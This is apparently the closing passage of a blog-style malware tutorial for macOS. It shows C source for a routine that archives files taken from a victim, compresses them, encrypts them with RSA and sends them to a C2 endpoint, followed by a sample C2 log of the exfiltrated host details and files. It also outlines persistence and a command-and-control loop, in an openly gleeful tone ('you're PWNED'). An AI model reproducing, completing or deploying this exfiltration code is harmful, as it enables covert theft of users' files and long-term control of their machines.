Ship it off to the C2 endpoint
Clean up

void sendFilesBundle(RSA *rsaPubKey) {
    if (!fileCount) return;
    
    char archivePath[512]={0};
    const char *tmpId = tmpDirectory + 5;
    snprintf(archivePath, sizeof(archivePath), _strings[3], tmpId);

    char tarcmd[1024]={0};
    snprintf(tarcmd,sizeof(tarcmd), _strings[2], archivePath, tmpDirectory);
    if (system(tarcmd)) return;

    // Read the tar file
    FILE *fp = fopen(archivePath,"rb");
    fseek(fp,0,SEEK_END);
    long archiveSize = ftell(fp);
    fseek(fp,0,SEEK_SET);
    unsigned char *archiveData = malloc(archiveSize);
    fread(archiveData,1,archiveSize,fp);
    fclose(fp);
    unlink(archivePath);

    // Compress it
    size_t compSize = 0;
    unsigned char *compData = compressData(archiveData, archiveSize, &compSize);
    free(archiveData);

    // Encrypt and send
    size_t packagedLen = 0;
    unsigned char *pkg = wrap_loot(compData, compSize, &packagedLen, rsaPubKey);
    free(compData);
    if (pkg) {
        overn_out(C2_ENDPOINT, pkg, packagedLen);
        free(pkg);
    }
}

Once it’s done, it nukes the temp files, kills the temp dir, frees up all the memory it touched. Clean exit. nothing left except the files it exfiltrated, which the user still thinks are right where they left ‘em.

[REMOTE HOST]
Saved to '/exfil05'

ID: EC001398-2683-46B9-823E-8CF1C570950D
=== Host ===

Software:
    System Software Overview:
        System Version: macOS Ventura 13.3.1 (Build 22D49)
        Kernel Version: Darwin 22.4.0
        Boot Volume: Macintosh HD
        Boot Mode: Normal
        Computer Name: 
        User Name: foo
        Secure Virtual Memory: Enabled
        System Integrity Protection: Enabled
        Time since boot: 


Hardware:
    Hardware Overview:
        Model Name: MacBook Pro
        Model Identifier: MacBookPro18,1
        Processor Name: 10-Core Intel Core i9
        Processor Speed: 2.3 GHz
        Hyper-Threading Technology: Enabled
        Number of Processors: 1
        Total Number of Cores: 10
        Memory: 32 GB
        System Firmware Version: 
        OS Loader Version: 
        SMC Version (system): 
        Serial Number (system): 
        Hardware UUID: 
        Provisioning UDID: 

[DATA]
Exfil:
	Extracted: 
		- ./color_128x.png, 
		- ./n_icon.png, ./preview.png, 
		- ./pyright-icon.png, ./icon.png
		- ....

And there you have it a smash-and-grab piece ;) Once we get a green light on receiving, the malware can drop an auto-script to relaunch itself a week later at a set date (time doesn’t matter), connect to the C2, and wait for commands. This loop keeps going until we tell it to self-delete, grabbing whatever we need from the host assuming the infiltration sticks.

Ain’t gonna do it for you though.

you’re PWNED

I guess that’s it, some pieces got clipped, some feel like they’re missing chunks… I trimmed stuff so this wouldn’t turn into a full-blown dissertation. Can’t dump it all at once. This is already huge, but remember this is just a researcher’s sketchbook: the core moves, enough to spark ideas and have fun. We can always circle back with more parts, new tricks, and techniques this shit never ends. As always, see you next time!